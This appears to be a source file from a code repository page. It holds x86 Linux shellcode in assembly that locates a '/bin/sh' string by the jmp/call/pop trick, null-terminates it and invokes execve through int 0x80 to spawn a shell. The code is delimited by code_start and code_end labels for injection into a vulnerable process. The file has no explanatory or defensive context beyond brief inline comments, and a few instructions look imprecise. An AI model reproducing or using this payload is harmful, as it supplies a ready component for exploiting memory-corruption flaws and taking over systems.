You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
20 lines
624 B
20 lines
624 B
.globl code_start
|
|
.globl code_end
|
|
.data
|
|
code_start:
|
|
jmp 27
|
|
popl %esi
|
|
movl %esi,0x8(%esi) /* put address of **argv behind shellcode,
|
|
0x8 bytes behind it so a /bin/sh has place */
|
|
xorl %eax,%eax /* put 0 in %eax */
|
|
movb %eax,0x7(%esi) /* put terminating 0 after /bin/sh string */
|
|
movl %eax,0xc(%esi) /* another 0 to get the size of a long word */
|
|
movb $0xb,%al /* execve( */
|
|
movl %esi,%ebx /* "/bin/sh", */
|
|
leal 0x8(%esi),%ecx /* & of "/bin/sh", */
|
|
xorl %edx,%edx /* NULL */
|
|
int $0x80 /* ); */
|
|
call -24
|
|
.string "/bin/shX" /* X is overwritten by movb %eax,0x7(%esi) */
|
|
code_end:
|
|
|
|
|